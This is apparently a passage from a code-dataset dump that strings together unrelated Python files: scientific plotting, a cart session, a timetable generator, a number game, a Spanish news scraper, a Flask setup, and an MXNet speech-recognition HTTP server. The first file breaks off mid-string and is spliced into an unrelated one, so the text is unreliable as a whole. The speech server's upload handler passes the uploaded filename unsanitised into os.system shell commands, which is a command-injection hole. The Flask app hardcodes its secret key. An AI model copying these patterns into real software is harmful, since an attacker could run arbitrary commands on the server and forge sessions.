ax.axhline(40, color='red')\n dataframe = self._tabData\n errorOriented =\\\n dataframe[dataframe['SpAngToMaj'] > 40].shape[0]/len(dataframe)\n title = '%% cells > 40 degree= %.4f' % errorOriented\n ax.text(15, 60, title,\n bbox={'facecolor': 'red', 'alpha': 0.5, 'pad': 15}, fontsize=13)\n if save:\n savefig(self._savePath+axisXName+\"_\"+axisYName)\n\n def plotHistogram(self, attribut, maxCount, save=False, suffix='',\n width=10):\n attr = self._tabData[attribut]\n self.plotHistogramWithVector(attr, attribut, maxCount, suffix, save,\n width)\n\n def plotHistogramWithVector(self, attr, attributName, maxCount, suffix='',\n save=False, width=10):\n fig, ax = plt.subplots(figsize=(15, 5))\n# ax.hist(list(attr), bins=np.arange(0, max(attr), max(attr)/len(attr) * width))\n ax.hist(list(attr), bins=np.arange(0, max(attr), width), normed=True,\n histtype='step')\n ax.set_yscale('log')\n if attributName == \"SpLength\":\n ax.text(30, 0.6, \"n=\"+str(len(attr)),\n bbox={'alpha': 0.5, 'pad': 15}, fontsize=13)\n plt.xlim(0, 35)\n plt.ylim(0, maxCount)\n elif attributName == \"SpAngToMaj\":\n ax.text(70, 0.5, \"n=\"+str(len(attr)),\n bbox={'alpha': 0.5, 'pad': 15}, fontsize=13)\n plt.xlim(0, 90)\n plt.ylim(0, maxCount)\n else:\n ax.text(0.8, 12, \"n=\"+str(len(attr)),\n bbox={'alpha': 0.5, 'pad': 15}, fontsize=13)\n plt.xlim(0, 1)\n plt.ylim(0, maxCount)\n# plt.xlabel(attributName)\n# plt.ylabel(\"count\")\n if save:\n savefig(self._savePath+\"hist_\"+attributName+suffix)\n\n def minAxisMajorAxisRatio(self):\n return self._tabData['CellMinLength']/self._tabData['CellMajLength']\n\n def showCell(self, index):\n cell = self._tabData.loc[index]\n fig, 
ax = plt.subplots(figsize=(14, 10))\n if \"-\" not in str(cell.Cell):\n cellPrefix = str(cell.Cell)\n else:\n cellPrefix = str(cell.Cell)[1:4]\n pathToImg = os.path.join(self._path,\n cell['AcquisitionCode'],\n \"X\"+str(int(cell.fieldX)) +\n \"_Y\"+str(int(cell.fieldY))+\"_FLUO\",\n \"croppedImgs\", cellPrefix + \".tif\")\n print(\"Path to image is:\\t\"+pathToImg)\n print(cell)\n tf = TiffFile(pathToImg)\n a = tf.asarray()\n ax.imshow(a, aspect='equal', interpolation='none', cmap='gray')\n# plt.colorbar()\n if cell['Feature'] == 'SPINDLE':\n calibration = 0.0645\n spbAlpha = 0.6\n axiAlpha = 0.7\n spotSize = 120\n cell_center_x = cell['CellCenterX']/calibration\n cell_center_y = cell['CellCenterY']/calibration\n spbs = ax.scatter([cell['spb1X']/calibration,\n cell['spb2X']/calibration],\n [cell['spb1Y']/calibration,\n cell['spb2Y']/calibration], c='red',\n marker='o', alpha=spbAlpha, s=spotSize)\n spCenter = ax.scatter(cell['SpCenterX']/calibration,\n cell['SpCenterY']/calibration,\n marker='x', c='red', s=spotSize)\n cellCenter = ax.scatter(cell_center_x,\n cell_center_y,\n marker='o', color='lime', s=spotSize)\n angle = np.deg2rad(-1*cell['CellAbsoMajAng'])\n majLen = cell['CellMajLength']/calibration\n minLen = cell['CellMinLength']/calibration\n\n majP1_x = cell_center_x - majLen/2*np.cos(angle)\n majP1_y = cell_center_y - majLen/2*np.sin(angle)\n majP2_x = cell_center_x + majLen/2*np.cos(angle)\n majP2_y = cell_center_y + majLen/2*np.sin(angle)\n\n angle = np.deg2rad(-1*cell['CellAbsoMajAng']+90)\n minP1_x = cell_center_x - minLen/2*np.cos(angle)\n minP1_y = cell_center_y - minLen/2*np.sin(angle)\n minP2_x = cell_center_x + minLen/2*np.cos(angle)\n minP2_y = cell_center_y + minLen/2*np.sin(angle)\n lineWid = 3\n majAxi, = ax.plot([majP1_x, majP2_x], [majP1_y, majP2_y], color='magenta', alpha=axiAlpha,linewidth=lineWid)\n minAxi, = ax.plot([minP1_x, minP2_x], [minP1_y, minP2_y], color='orange', alpha=axiAlpha,linewidth=lineWid)\n sp, = ax.plot([cell['spb1X']/calibration,\n cell['spb2X']/calibration],\n [cell['spb1Y']/calibration,\n cell['spb2Y']/calibration], c='red', color='red', alpha=axiAlpha,linewidth=lineWid)\n ax.set_ylim(0, a.shape[0])\n ax.set_xlim(0, a.shape[1])\n legend = ax.legend((spbs, spCenter, cellCenter, majAxi, minAxi, sp),\n ('SPBs', 'Spindle Center', 'Cell Center', 'major axis', 'minor axis','spindle'),\n scatterpoints=1, fontsize='xx-large')\n frame = legend.get_frame()\n frame.set_color('white')\n\n def rotateMitosisCells(self):\n self.dataCleanUp()\n mitosis_cells = self._tabData[self._tabData['Feature'] == 'SPINDLE']\n mitosis_cells['CellCenterY'] = mitosis_cells['CellCenterY'] - 2*mitosis_cells['CellCenterY']\n mitosis_cells['SpCenterY'] = mitosis_cells['SpCenterY'] - 2*mitosis_cells['SpCenterY']\n mitosis_cells['spb1Y'] = mitosis_cells['spb1Y'] - 2*mitosis_cells['spb1Y']\n mitosis_cells['spb2Y'] = mitosis_cells['spb2Y'] - 2*mitosis_cells['spb2Y']\n m_rotated = pd.DataFrame([])\n coords = ['spb1X', 'spb1Y', 'spb2X', 'spb2Y', 'SpCenterX',\n 'SpCenterY', 'CellCenterX', 'CellCenterY']\n mitosis_cells[coords] = mitosis_cells[coords].astype('float')\n mitosis_cells['theta'] = np.deg2rad(180 - mitosis_cells['CellAbsoMajAng']).astype('float')\n for i, (cell_id, cell) in enumerate(mitosis_cells.iterrows()):\n rotMatrix = np.array([[np.cos(cell['theta']), - np.sin(cell['theta'])],\n [np.sin(cell['theta']), np.cos(cell['theta'])]])\n cell[coords] = np.dot(rotMatrix,\n cell[coords].values.reshape(len(coords) / 2, 2).T).T.flatten()\n m_rotated = m_rotated.append(cell)\n 
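# the two assignments below shift every coordinate so that the cell center ends up at the origin (0, 0)\n        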
m_rotated.loc[:, ['spb1X', 'spb2X', 'SpCenterX', 'CellCenterX']] = m_rotated.loc[:, ['spb1X' , 'spb2X' , 'SpCenterX' , 'CellCenterX']].values - m_rotated.loc[:, ['CellCenterX']].values\n m_rotated.loc[:, ['spb1Y', 'spb2Y', 'SpCenterY', 'CellCenterY']] = m_rotated.loc[:, ['spb1Y' , 'spb2Y' , 'SpCenterY' , 'CellCenterY']].values - m_rotated.loc[:, ['CellCenterY']].values \n self._rotatedData = m_rotated\n\n def showVirtualCell(self, minLength=None, maxLength=None, plotSpindle=False, save=False, suffix='', xlim=15):\n m_to_plot = self._rotatedData.copy()\n# m_to_plot = m_to_plot.iloc[(2420, 2447), ]\n showAllLength = False\n if (minLength is None) or (maxLength is None):\n if (minLength is None) & (maxLength is None):\n showAllLength = True\n if minLength is None:\n minLength = 0\n if maxLength is None:\n maxLength = 99\n m_to_plot = m_to_plot[m_to_plot['SpLength'] > minLength]\n m_to_plot = m_to_plot[m_to_plot['SpLength'] <= maxLength]\n fig, ax = plt.subplots(figsize=(15, 5))\n # Plot spindle\n if plotSpindle:\n ax.plot(m_to_plot.loc[:, ['spb1X', 'spb2X']].values.T,\n m_to_plot.loc[:, ['spb1Y', 'spb2Y']].values.T,\n color='black', lw=2, alpha=0.1, linewidth=4)\n # Plot scatter, s=100\n ax.scatter(m_to_plot['spb1X'], m_to_plot['spb1Y'], color='red', alpha=0.6)\n ax.scatter(m_to_plot['spb2X'], m_to_plot['spb2Y'], color='red', alpha=0.6)\n# ax.scatter(m_to_plot['SpCenterX'], m_to_plot['SpCenterY'], color='red', alpha=0.6, marker='x', s=100)\n ax.scatter(0, 0, color='green', alpha=0.6, s=100)\n # Plot central lines\n# ax.axvline(0, color='black')\n# ax.axhline(0, color='black')\n ax.set_aspect('equal')\n\n args = dict(color='red', alpha=0.6, lw=4)\n # Plot major axis border\n# major_mean = m_to_plot['CellMajLength'].mean()\n# ax.axvline(-major_mean / 2, **args)\n# ax.axvline(major_mean / 2, **args)\n # Plot minor axis border\n# minor_mean = m_to_plot['CellMinLength'].mean()\n# ax.axhline(-minor_mean / 2, **args)\n# ax.axhline(minor_mean / 2, **args)\n# ax.set_xlabel(\"major axis ($μm$)\", fontsize=25)\n# ax.set_ylabel(\"minor axis ($μm$)\", fontsize=25)\n# if showAllLength:\n# ax.set_title(\"Distribution of spbs(red) and center of spb(green) with all spindle length\")\n# else:\n# ax.set_title(\"Distribution of spbs(red) and center of spb(green) with spindle \"+str(minLength)+\", 'quantity': , 'name': , 'cost': }, ...]\n \"\"\"\n sessionid = get_or_create_session(db)\n\n cur = db.cursor()\n cur.execute(\"SELECT data FROM sessions WHERE sessionid=(?)\", (sessionid,))\n result = []\n row = cur.fetchone()\n cart = json.loads(row['data'])\n\n for item in cart:\n item['id'] = str(item['id'])\n item['cost'] = int(item['cost'])\n item['quantity'] = int(item['quantity'])\n\n return cart\n\n","sub_path":"Old Comp249 Assignments/Part-2/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"436590916","text":"#!/usr/bin/env python3\nfrom collections import defaultdict\n\nyear = 2018\nsemester = 3\n\nDAYS = ('M', 'T', 'W', 'Th', 'F')\n\nSTYLE = '''\n\n'''\n\ndef _start_and_duration(timestr):\n '''Parse start hour and duration from a time span string\n\n Strings look like \"9:00AM - 10:15\".\n This function does some very simplistic rounding to the next half-hour.\n\n Returns (start_hour, duration) where start_hour is the hour in 24-hour\n format and duration is the number of half-hours to the end.\n\n TODO: it might help to add doctests to this.\n '''\n\n # parsing string\n 
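# e.g. \"9:00AM - 10:15\" splits into start_time \"9:00AM\" and end_time \"10:15\"\n    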
start_time, end_time = timestr.split(' - ')\n\n start_hour, start_minute = start_time.split(':')\n end_hour, end_minute = end_time.split(':')\n\n start_period = start_minute[-2:]\n start_minute = start_minute[:-2]\n start_hour = int(start_hour)\n start_minute = int(start_minute)\n\n end_hour = int(end_hour)\n end_minute = int(end_minute)\n\n # convert to 24-hour\n if start_period == 'PM' and start_hour != 12:\n start_hour += 12\n if end_hour < start_hour:\n end_hour += 12\n\n # simple half-hour rounding\n if end_minute > 30:\n end_hour += 1\n else:\n end_hour += 0.5\n\n if start_minute != 0:\n start_hour += 0.5\n\n # duration in half-hours\n duration = int((end_hour - start_hour) * 2)\n return start_hour, duration\n\ndef extract_table_data(courses):\n # {instructor: {day: {start_hour: {label: room, span: duration}}}}\n instructors = defaultdict(\n lambda: defaultdict(\n lambda: defaultdict(\n lambda: {'label': '', 'span': 1})))\n # {room: {day: {start_hour: {label: instructor, span: duration}}}}\n rooms = defaultdict(\n lambda: defaultdict(\n lambda: defaultdict(\n lambda: {'label': '', 'span': 1})))\n\n for course in courses:\n course_id = course['course_id']\n course_name = course_id.split()[-1]\n for ticket in course.get('tickets', []):\n instructor = ticket['instructor']\n instructor_last = instructor.split()[-1]\n for session in ('lecture', 'lab'):\n room = ticket[session]['room']\n days = ticket[session]['day']\n time = ticket[session]['time']\n start, duration = _start_and_duration(time)\n start = int(start*2) # columns are half-hours, not hours\n room_cell = { 'label': instructor_last, 'span': duration }\n instructor_cell = { 'label': course_name, 'span': duration }\n rooms[room][days][start] = room_cell\n instructors[instructor][days][start] = instructor_cell\n for i in range(1, duration):\n rooms[room][days][start+i] = None\n instructors[instructor][days][start+i] = None\n for day in days.split():\n room_cell = {\n 'label': instructor_last,\n 'span': duration\n }\n rooms[room][day][start] = room_cell\n instructor_cell = {\n 'label': course_name,\n 'span': duration\n }\n instructors[instructor][day][start] = instructor_cell\n # insert Nones so that the HTML generator doesn't add extra s\n for i in range(1, duration):\n rooms[room][day][start+i] = None\n instructors[instructor][day][start+i] = None\n\n return rooms, instructors\n\ndef convert_to_table(table_data, days=DAYS):\n rows = []\n table = {\n 'rows': rows,\n 'day_start': {day: 48 for day in days},\n 'day_end': {day: 0 for day in days},\n }\n\n # find start time and end time of each day\n for head in table_data.keys():\n for day in days:\n if day in table_data[head]:\n day_table = table_data[head][day]\n for time in day_table.keys():\n slot = day_table[time]\n if time < table['day_start'][day]:\n table['day_start'][day] = time\n if slot and time + slot['span'] > table['day_end'][day]:\n table['day_end'][day] = time + slot['span']\n\n # fill in cells for each day\n for head in sorted(table_data.keys()):\n cells = []\n row = {'heading': head, 'cells': cells}\n rows.append(row)\n\n for day in days:\n day_table = table_data[head][day]\n for time in range(table['day_start'][day], table['day_end'][day]):\n slot = day_table[time]\n if slot:\n cells.append(slot)\n\n return table\n\n\ndef generate_html(table, days=DAYS):\n # colgroups are used to apply column-wise CSS styles\n colgroups = [\n '',\n ]\n for day in days:\n cols = '' * (table['day_end'][day] - table['day_start'][day])\n colgroups.append('{}'.format(\n day, cols))\n\n 
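# build the header cells next: one cell per day spanning all of its columns, then one cell per hour of that day\n    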
headers = [\n '',\n ]\n # header for each day\n for day in days:\n cols = table['day_end'][day] - table['day_start'][day]\n headers.append('{}'.format(cols, day))\n headers.append('')\n headers.append('')\n\n # hours in each day\n for day in days:\n cols = table['day_end'][day] - table['day_start'][day]\n cols //= 2\n for col in range(cols):\n col += table['day_start'][day] // 2\n headers.append('{}'.format(col))\n headers.append('')\n\n rows = []\n for row in table['rows']:\n labels = []\n for cell in row['cells']:\n labels.append('{}'.format(\n cell['span'],\n cell['label']))\n rows.append('{}{}'.format(\n row['heading'],\n ''.join(labels)))\n\n html = '''\n \n {colgroups}\n {headers}\n {rows}\n
\n '''.format(colgroups=''.join(colgroups),\n headers=''.join(headers),\n rows=''.join(rows))\n return html\n\nif __name__ == '__main__':\n import json\n\n cFileName = 'courses{year}-{semester}.json'\n with open(cFileName.format(year=year, semester=semester), 'r') as file:\n courses = json.load(file)\n\n rooms, instructors = extract_table_data(courses)\n days = ('M W', 'T Th', 'F')\n room_table = convert_to_table(rooms, days)\n instructor_table = convert_to_table(instructors, days)\n\n html = STYLE\n html += generate_html(room_table, days)\n html += '
<br>
'\n html += generate_html(instructor_table, days)\n htmlFileName = 'courses{year}-{semester}.html'\n with open(htmlFileName.format(year=year, semester=semester), 'w') as file:\n file.write(html)\n\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"246621193","text":"import argparse\r\nimport numpy as np\r\nimport os\r\nimport pandas as pd\r\n\r\n\r\ndef main():\r\n\r\n parser = argparse.ArgumentParser(description='Behavioral Cloning Training Program')\r\n parser.add_argument('-d', help='data directory', dest='data_dir', type=str, default='data')\r\n parser.add_argument('-t', help='test size fraction', dest='test_size', type=float, default=0.2)\r\n parser.add_argument('-k', help='drop out probability', dest='keep_prob', type=float, default=0.5)\r\n parser.add_argument('-n', help='number of epochs', dest='nb_epoch', type=int, default=10)\r\n parser.add_argument('-s', help='samples per epoch', dest='samples_per_epoch', type=int, default=20000)\r\n parser.add_argument('-b', help='batch size', dest='batch_size', type=int, default=40)\r\n parser.add_argument('-l', help='learning rate', dest='learning_rate', type=float, default=1.0e-4)\r\n args = parser.parse_args()\r\n\r\n\r\n\r\n data_df = pd.read_csv(os.path.join(args.data_dir, 'driving_log.csv'))\r\n \r\n T = data_df.shape[0]\r\n q = np.zeros(T)\r\n \r\n q[T-1] = data_df[\"speed\"][T-1]\r\n \r\n for i in reversed(range(T-1)):\r\n q[i] = data_df[\"speed\"][i:min(i+120,T-1)].mean()\r\n \r\n data_df[\"qs\"] = q\r\n \r\n data_df.to_csv(os.path.join(args.data_dir, 'driving_log.csv'))\r\n \r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"reward_model.py","file_name":"reward_model.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"383654072","text":"import random\n\n\n# welcome\ndef welcome_print():\n print(\"\"\"\n Welcome to our secret-number-guess-game!\n The secret number lies between 1 and 50.\n If you only need 1 guess to get it right, you win the jackpot of -- $ 1 Million !! -- \"\"\")\n print(\"-\" * 100)\n\n\n# first guess, to win $ 1 million\ndef first_guess(number):\n for guess in range(1):\n try:\n guess = int(raw_input(\"\"\"This is your first guess. You can win $ 1 Million. Guess wise: \"\"\"))\n except ValueError:\n print(\"You didn't enter a valid number.\")\n break\n if guess == number:\n print(\"Congratulation! You guessed the secret number correctly, and won $ 1 Million!\"\n \"\\nBut you forgot one thing...\"\n \"\\nThe House ALWAYS wins...\"\n \"\\n...'security comes in'...\")\n # break not needed, because range = 1\n elif guess < number:\n print(\"Sorry, you didn't guess correct. \"\n \"\\nSo you can't win the $ 1 Million anymore, \"\n \"\\nbut you can still keep playing.\")\n print(\"Try something bigger!\")\n other_guesses(number)\n elif guess > number:\n print(\"Sorry, you didn't guess correct. 
\"\n \"\\nSo you can't win the $ 1 Million anymore, \"\n \"\\nbut you can still keep playing.\")\n print(\"Try something smaller!\")\n other_guesses(number)\n\n # when first guess was wrong, the program continues here\n # because of the wide guess-range and therefore possible boredom,\n # the user gets asked after 10 guesses if he wants to keep playing or not.\n\n\ndef other_guesses(number):\n for guess in range(9):\n try:\n guess = int(raw_input(\"Guess the secret number: \"))\n except ValueError:\n print(\"You didn't enter a valid number.\")\n continue\n if guess == number:\n print(\"Congratulations! You guessed the secret number correctly.\")\n break\n elif guess < number:\n print(\"Try something bigger!\")\n continue\n elif guess > number:\n print(\"Try something smaller!\")\n continue\n guess_again()\n\n\ndef guess_again():\n print(\"\")\n print(\"You have used all your 10 guesses.\")\n another_guess = raw_input(\"\"\"\n Do you want to play again?\n Please type yes or no.\n \"\"\")\n if another_guess.lower() == \"yes\" or another_guess.lower() == \"y\":\n secret_new = random.randint(1, 50)\n main(secret_new)\n else:\n print (\"\"\"\n Thanks for playing.\n Goodbye.\n \"\"\")\n\n\ndef main(number):\n first_guess(number)\n\n# code below gets only executed, if this exact file is being run directly\n# if someone imports the main function, the code below is not going to be executed\n\n\nsecret_number = random.randint(1, 50)\nif __name__ == \"__main__\":\n main(secret_number)\n","sub_path":"Python/Guess the secret number/guess_secret_number.py","file_name":"guess_secret_number.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"567424512","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nimport re\nfrom newspaper import Article\n\nimport goslate\n\ncategories = ['news','opinion','business','money','sport',\n 'lifestyle','arts','politics','culture']\n\nurlb = 'http://politica.elpais.com'\n\ncategoryDetail = [{'name':'sport',\n 'url':'http://deportes.elpais.com',\n 'keyword': '/deportes/'},\n {'name':'business',\n 'url':'http://economia.elpais.com/',\n 'keyword': '/economia/'},\n {'name':'politics',\n 'url':'http://politica.elpais.com',\n 'keyword': '/politica/'},\n {'name':'lifestyle',\n 'url':'http://cultura.elpais.com/',\n 'keyword': '/cultura/'},\n ]\n\ndef getSpainNews(category):\n\n if category in categories:\n url = ''\n if category == 'sport':\n url = categoryDetail[0]['url']\n cate = categoryDetail[0]['keyword']\n\n if category =='business':\n url = categoryDetail[1]['url']\n cate = categoryDetail[1]['keyword']\n\n if category =='politics':\n url = categoryDetail[2]['url']\n cate = categoryDetail[2]['keyword']\n\n if category =='lifestyle':\n url = categoryDetail[3]['url']\n cate = categoryDetail[3]['keyword']\n\n\n\n content = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(content, from_encoding='utf8')\n\n article_list = []\n\n hotNews = soup.find_all('img')\n\n\n\n for i in hotNews:\n parent = i.parent\n a = parent.attrs\n # print(a)\n if 'href' in a:\n\n m = re.match(r\"^%s\" % cate,a['href'])\n if m is not None:\n\n url = a['href']\n articleUrl = urlb.__add__(url)\n article_list.append(articleUrl)\n\n # print(article_list)\n return article_list\n\n\n\ndef getSpainArticlese(url_list):\n\n spainArticles = []\n\n title = ''\n summary = ''\n articleUrl = ''\n imageUrl = ''\n keywords = []\n\n for i in url_list:\n url = i\n\n\n # url = 
'http://deportes.elpais.com/deportes/2015/07/21/actualidad/1437504468_097396.html'\n a = Article(url,language = 'es')\n\n a.download()\n a.parse()\n\n title = translateToEn(a.title)\n imageUrl = a.top_image\n summary = translateToEn(a.text[:1500])\n\n np_extractor = NPExtractor(title)\n keywords = np_extractor.extract()\n\n current_article_dict = {\n \"title\": title,\n \"description\": summary,\n \"articleUrl\": url,\n \"imageUrl\": imageUrl,\n \"keywords\": keywords\n }\n spainArticles.append(current_article_dict)\n\n\n\n return spainArticles\n\n\ndef translateToEn(text):\n\n gs = goslate.Goslate()\n result = gs.translate(text,'en')\n return result\n\n\nimport nltk\nfrom nltk.corpus import brown\n\n# This is a fast and simple noun phrase extractor (based on NLTK)\n# Feel free to use it, just keep a link back to this post\n# http://thetokenizer.com/2013/05/09/efficient-way-to-extract-the-main-topics-of-a-sentence/\n# http://www.sharejs.com/codes/\n# Create by Shlomi Babluki\n# May, 2013\n\n\n# This is our fast Part of Speech tagger\n#############################################################################\nbrown_train = brown.tagged_sents(categories='news')\nregexp_tagger = nltk.RegexpTagger(\n [(r'^-?[0-9]+(.[0-9]+)?$', 'CD'),\n (r'(-|:|;)$', ':'),\n (r'\\'*$', 'MD'),\n (r'(The|the|A|a|An|an)$', 'AT'),\n (r'.*able$', 'JJ'),\n (r'^[A-Z].*$', 'NNP'),\n (r'.*ness$', 'NN'),\n (r'.*ly$', 'RB'),\n (r'.*s$', 'NNS'),\n (r'.*ing$', 'VBG'),\n (r'.*ed$', 'VBD'),\n (r'.*', 'NN')\n])\nunigram_tagger = nltk.UnigramTagger(brown_train, backoff=regexp_tagger)\nbigram_tagger = nltk.BigramTagger(brown_train, backoff=unigram_tagger)\n#############################################################################\n\n\n# This is our semi-CFG; Extend it according to your own needs\n#############################################################################\ncfg = {}\ncfg[\"NNP+NNP\"] = \"NNP\"\ncfg[\"NN+NN\"] = \"NNI\"\ncfg[\"NNI+NN\"] = \"NNI\"\ncfg[\"JJ+JJ\"] = \"JJ\"\ncfg[\"JJ+NN\"] = \"NNI\"\n#############################################################################\n\n\nclass NPExtractor(object):\n\n def __init__(self, sentence):\n self.sentence = sentence\n\n # Split the sentence into singlw words/tokens\n def tokenize_sentence(self, sentence):\n tokens = nltk.word_tokenize(sentence)\n return tokens\n\n # Normalize brown corpus' tags (\"NN\", \"NN-PL\", \"NNS\" > \"NN\")\n def normalize_tags(self, tagged):\n n_tagged = []\n for t in tagged:\n if t[1] == \"NP-TL\" or t[1] == \"NP\":\n n_tagged.append((t[0], \"NNP\"))\n continue\n if t[1].endswith(\"-TL\"):\n n_tagged.append((t[0], t[1][:-3]))\n continue\n if t[1].endswith(\"S\"):\n n_tagged.append((t[0], t[1][:-1]))\n continue\n n_tagged.append((t[0], t[1]))\n return n_tagged\n\n # Extract the main topics from the sentence\n def extract(self):\n\n tokens = self.tokenize_sentence(self.sentence)\n tags = self.normalize_tags(bigram_tagger.tag(tokens))\n\n merge = True\n while merge:\n merge = False\n for x in range(0, len(tags) - 1):\n t1 = tags[x]\n t2 = tags[x + 1]\n key = \"%s+%s\" % (t1[1], t2[1])\n value = cfg.get(key, '')\n if value:\n merge = True\n tags.pop(x)\n tags.pop(x)\n match = \"%s %s\" % (t1[0], t2[0])\n pos = value\n tags.insert(x, (match, pos))\n break\n\n matches = []\n for t in tags:\n if t[1] == \"NNP\" or t[1] == \"NNI\":\n #if t[1] == \"NNP\" or t[1] == \"NNI\" or t[1] == \"NN\":\n matches.append(t[0])\n return matches\n\n\n# print (getSpainArticlese(getSpainNews('business')))","sub_path":"Source 
code/mysite/news/SpainNews.py","file_name":"SpainNews.py","file_ext":"py","file_size_in_byte":6261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"577847379","text":"# imports\nfrom logging import log\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import path\nfrom flask_login import LoginManager, login_manager\n\n# initialise database\ndb = SQLAlchemy()\nDB_NAME = \"database.db\"\n\n# create app\ndef create_app():\n # initialize the app\n app = Flask(__name__)\n\n # set the secret key used to sign session data\n app.config[\"SECRET_KEY\"] = \"development\"\n\n # connect database\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = f\"sqlite:///{DB_NAME}\"\n db.init_app(app)\n\n # import routes\n from .views import views\n from .auth import auth\n\n app.register_blueprint(views, url_prefix = \"/\")\n app.register_blueprint(auth, url_prefix = \"/\")\n\n # check database\n from .models import User, Note\n create_database(app)\n\n # start login manager\n login_manager = LoginManager()\n login_manager.init_app(app)\n login_manager.login_view = \"auth.login\"\n\n @login_manager.user_loader\n def load_user(id):\n return User.query.get(int(id))\n\n return app\n\n# create database\ndef create_database(app):\n if not path.exists(f\"website/{DB_NAME}\"):\n db.create_all(app = app)\n print(\"Database created\")","sub_path":"website/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"85400658","text":"import csv\n\nwith open('npi.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n measures = []\n scol = 6\n fcol = 30\n startd = []\n for row in csv_reader:\n if(line_count == 0):\n dateline = row\n line_count +=1\n for i in range(scol,fcol):\n if(row[i] == '1'):\n print(dateline[i])\n measures.append(row[2])\n startd.append(dateline[i])\n break\n #print(\"line_count\", line_count, \"text\", row[28])\n \n\nprint(measures)\nprint(startd)\nprint(len(startd), len(measures))\nfor i in range(0, len(startd)):\n print(measures[i], startd[i])\n\nf = open('outfile.csv', 'w')\n\nwith f:\n\n writer = csv.writer(f)\n \n for i in range(0, len(startd)):\n writer.writerow([measures[i], startd[i]])\n\nprint(len(startd))","sub_path":"convertCSV.py","file_name":"convertCSV.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"162366915","text":"# -*- coding: utf-8 -*-\nimport BaseHTTPServer\nimport bisect\nimport cgi\nimport json\nimport os\nimport sys\nimport time\nfrom BaseHTTPServer import HTTPServer\nfrom datetime import datetime\n\nimport mxnet as mx\nimport numpy as np\n\nfrom config_util import parse_args, parse_contexts, generate_file_path\nfrom label_util import LabelUtil\nfrom log_util import LogUtil\nfrom main import load_labelutil\nfrom stt_datagenerator import DataGenerator\nfrom stt_metric import EvalSTTMetric\nfrom stt_utils import spectrogram_from_file\n\n# os.environ['MXNET_ENGINE_TYPE'] = \"NaiveEngine\"\nos.environ['MXNET_ENGINE_TYPE'] = \"ThreadedEnginePerDevice\"\nos.environ['MXNET_ENABLE_GPU_P2P'] = \"0\"\n\n\nclass WHCS:\n width = 0\n height = 0\n channel = 0\n stride = 0\n\n\nclass ConfigLogger(object):\n def __init__(self, log):\n self.__log = log\n\n def __call__(self, config):\n self.__log.info(\"Config:\")\n config.write(self)\n\n def write(self, data):\n # stripping the data makes 
the output nicer and avoids empty lines\n line = data.strip()\n self.__log.info(line)\n\n\nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n # Simple HTTP request handler with POST commands.\n\n def do_POST(self):\n # print self.headers['Content-Type']\n # print self.rfile\n form = cgi.FieldStorage(\n fp=self.rfile,\n headers=self.headers,\n environ={'REQUEST_METHOD': 'POST',\n 'CONTENT_TYPE': self.headers['Content-Type'],\n })\n filename = form['file'].filename\n print(\"filename is: \" + str(filename))\n output_file_pre = \"/Users/lonica/Downloads/wav/\"\n part1, part2 = filename.rsplit(\".\", 1)\n if filename.endswith(\".speex\"):\n data = form['file'].file.read()\n open(\"./\" + filename, \"wb\").write(data)\n command = \"./SpeexDecode \" + filename + \" \" + part1 + \".wav\"\n os.system(command)\n data = open(part1 + \".wav\", 'rb').read()\n open(\"./lolol.wav\", \"wb\").write(data)\n\n elif filename.endswith(\".amr\"):\n data = form['file'].file.read()\n open(output_file_pre + filename, \"wb\").write(data)\n command = \"ffmpeg -y -i \" + output_file_pre + part1 + \".amr -acodec pcm_s16le -ar 16000 -ac 1 -b 256 \" + output_file_pre + part1 + \".wav\"\n os.system(command)\n\n elif filename.lower().endswith(\".wav\"):\n data = form['file'].file\n # import soundfile as sf\n # audio, sr1 = sf.read(data, dtype='float32')\n open(output_file_pre + part1 + \".wav\", \"wb\").write(data.read())\n\n # create_desc_json.ai_2_word_single(output_file_pre + part1 + \".wav\")\n trans_res = otherNet.getTrans(output_file_pre + part1 + \".wav\")\n content = bytes(u\"没有检测到语音,请重新录制\".encode(\"utf-8\"))\n if trans_res:\n content = bytes(trans_res.encode(\"utf-8\"))\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/plain; charset=utf-8\")\n self.send_header(\"Content-Length\", len(content))\n self.end_headers()\n self.wfile.write(content)\n\n\ndef load_model(args):\n # load model from model_name prefix and epoch of model_num_epoch with gpu contexts of contexts\n is_start_from_batch = args.config.getboolean('load', 'is_start_from_batch')\n\n from importlib import import_module\n symbol_template = import_module(args.config.get('arch', 'arch_file'))\n\n model_file = args.config.get('common', 'model_file')\n model_name = os.path.splitext(model_file)[0]\n model_num_epoch = int(model_name[-4:])\n\n model_path = 'checkpoints/' + str(model_name[:-5])\n\n bucketing_arch = symbol_template.BucketingArch(args)\n model_loaded = bucketing_arch.get_sym_gen()\n\n return model_loaded, model_num_epoch, model_path\n\n\nclass Net(object):\n def __init__(self):\n if len(sys.argv) <= 1:\n raise Exception('cfg file path must be provided. 
